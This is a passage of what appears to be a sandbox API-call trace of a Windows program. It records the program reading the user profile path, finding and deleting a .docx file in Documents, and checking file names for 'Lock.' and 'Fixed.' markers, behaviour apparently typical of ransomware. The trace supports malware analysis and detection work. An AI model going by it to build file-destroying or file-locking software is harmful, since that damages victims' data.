out: lpsz="A4F00A00447") returned 0xb [0215.110] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0215.110] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0215.110] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0215.110] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0215.110] FreeLibrary (hLibModule=0x76390000) returned 1 [0215.110] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.110] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.110] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.110] CloseHandle (hObject=0x510) returned 1 [0215.112] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.112] CloseHandle (hObject=0x504) returned 1 [0215.115] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.118] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0215.118] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0215.118] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0215.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0215.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0215.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721b8 [0215.118] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/23iZdkXXLok6512uz.docx", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\23iZdkXXLok6512uz.docx", lpFilePart=0x8cedf4*="23iZdkXXLok6512uz.docx") returned 0x30 [0215.118] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0215.118] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\23iZdkXXLok6512uz.docx" (normalized: "c:\\users\\fd1hvy\\documents\\23izdkxxlok6512uz.docx")) returned 0x20 [0215.118] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\23iZdkXXLok6512uz.docx", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcd02cd50, ftCreationTime.dwHighDateTime=0x1d596a9, ftLastAccessTime.dwLowDateTime=0x979171f0, ftLastAccessTime.dwHighDateTime=0x1d58707, ftLastWriteTime.dwLowDateTime=0x979171f0, ftLastWriteTime.dwHighDateTime=0x1d58707, nFileSizeHigh=0x0, nFileSizeLow=0x11490, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="23iZdkXXLok6512uz.docx", cAlternateFileName="23IZDK~1.DOC")) returned 0x9e1c38 [0215.119] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\23iZdkXXLok6512uz.docx" (normalized: "c:\\users\\fd1hvy\\documents\\23izdkxxlok6512uz.docx")) returned 1 [0215.124] FindNextFileW (in: hFindFile=0x9e1c38, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcd02cd50, ftCreationTime.dwHighDateTime=0x1d596a9, ftLastAccessTime.dwLowDateTime=0x979171f0, ftLastAccessTime.dwHighDateTime=0x1d58707, ftLastWriteTime.dwLowDateTime=0x979171f0, ftLastWriteTime.dwHighDateTime=0x1d58707, nFileSizeHigh=0x0, nFileSizeLow=0x11490, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="23iZdkXXLok6512uz.docx", cAlternateFileName="23IZDK~1.DOC")) returned 0 [0215.124] FindClose (in: hFindFile=0x9e1c38 | out: hFindFile=0x9e1c38) returned 1 [0215.124] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x38540b0 | out: hHeap=0x2af0000) returned 1 [0215.125] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0215.125] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae40 | out: hHeap=0x2af0000) returned 1 [0215.125] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0215.125] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0215.125] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0215.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0215.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0215.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0215.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0215.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0215.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72358 [0215.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0215.125] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0215.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0215.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721a8 [0215.125] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0215.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0215.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0215.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaea0 [0215.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0215.125] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0215.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab038 [0215.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72358 [0215.125] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0215.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0215.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0215.125] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72338 [0215.126] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0215.126] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0215.126] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0215.126] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab008 | out: hHeap=0x2af0000) returned 1 [0215.126] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0215.126] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0215.126] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaff0 | out: hHeap=0x2af0000) returned 1 [0215.126] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0215.126] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae40 | out: hHeap=0x2af0000) returned 1 [0215.126] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0215.126] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721e8 [0215.126] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7100 [0215.126] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0215.126] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x3854740 [0215.126] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0215.126] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab008 | out: hHeap=0x2af0000) returned 1 [0215.126] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0215.126] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0215.126] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0215.126] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0215.126] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0215.126] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0215.126] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7100 | out: hHeap=0x2af0000) returned 1 [0215.126] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0215.126] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0215.126] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0215.126] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0215.127] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0215.127] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0215.127] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72358 [0215.127] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0215.127] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0215.127] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0215.127] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0215.127] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0215.127] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0215.127] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x62) returned 0x29f7878 [0215.127] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/23iZdkXXLok6512uz.docx", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\23iZdkXXLok6512uz.docx", lpFilePart=0x8cf650*="23iZdkXXLok6512uz.docx") returned 0x30 [0215.127] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0215.127] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\23iZdkXXLok6512uz.docx" (normalized: "c:\\users\\fd1hvy\\documents\\23izdkxxlok6512uz.docx")) returned 0xffffffff [0215.127] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3854740 | out: hHeap=0x2af0000) returned 1 [0215.127] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0215.127] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0215.127] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0215.127] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0215.127] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0215.127] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0215.127] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ecc0 | out: hHeap=0x2af0000) returned 1 [0215.127] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0215.127] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0215.127] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0215.127] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72288 [0215.127] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0215.127] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0215.128] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72318 [0215.128] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0215.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0215.128] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0215.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0215.128] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0215.128] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722c8 [0215.128] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0215.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0215.128] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4pPJKhvtklZXxwQ0M09.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0215.128] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pPJKhvtklZXxwQ0M09.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0215.128] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PJKhvtklZXxwQ0M09.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0215.128] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JKhvtklZXxwQ0M09.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0215.128] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KhvtklZXxwQ0M09.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0215.128] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hvtklZXxwQ0M09.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0215.128] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vtklZXxwQ0M09.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0215.128] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tklZXxwQ0M09.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0215.128] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="klZXxwQ0M09.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0215.128] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lZXxwQ0M09.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0215.128] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZXxwQ0M09.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0215.128] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XxwQ0M09.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0215.128] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xwQ0M09.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0215.128] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wQ0M09.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0215.128] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Q0M09.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0215.128] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0M09.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0215.128] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="M09.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0215.128] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="09.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0215.128] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9.docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0215.128] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".docx", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0215.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab008 | out: hHeap=0x2af0000) returned 1 [0215.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0215.128] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0215.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0215.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaff0 | out: hHeap=0x2af0000) returned 1 [0215.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0215.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0215.129] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec40 [0215.129] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0215.129] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0215.129] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0215.129] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0215.129] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0215.129] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0215.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0215.129] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0215.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0215.129] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0215.129] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72248 [0215.129] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0215.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0215.129] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf48 [0215.129] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0215.129] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0215.129] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0215.129] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0215.129] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722b8 [0215.129] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x32) returned 0x2a5ea40 [0215.129] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721e8 [0215.129] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4pPJKhvtklZXxwQ0M09.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0215.130] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pPJKhvtklZXxwQ0M09.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0215.130] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PJKhvtklZXxwQ0M09.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0215.130] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JKhvtklZXxwQ0M09.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0215.130] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KhvtklZXxwQ0M09.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0215.130] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hvtklZXxwQ0M09.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0215.130] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vtklZXxwQ0M09.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0215.130] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tklZXxwQ0M09.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0215.130] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="klZXxwQ0M09.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0215.130] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lZXxwQ0M09.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0215.130] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZXxwQ0M09.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0215.130] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XxwQ0M09.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0215.130] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xwQ0M09.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0215.130] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wQ0M09.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0215.130] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Q0M09.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0215.130] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0M09.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0215.130] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="M09.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0215.130] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="09.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0215.130] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9.docx", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0215.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaea0 | out: hHeap=0x2af0000) returned 1 [0215.130] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0215.130] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0215.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0215.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0215.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0215.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaff0 | out: hHeap=0x2af0000) returned 1 [0215.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 [0215.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0215.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0215.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf48 | out: hHeap=0x2af0000) returned 1 [0215.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab008 | out: hHeap=0x2af0000) returned 1 [0215.130] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0215.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a734f8 | out: hHeap=0x2af0000) returned 1 [0215.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0215.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0215.131] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0215.131] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0215.131] PeekMessageW (in: 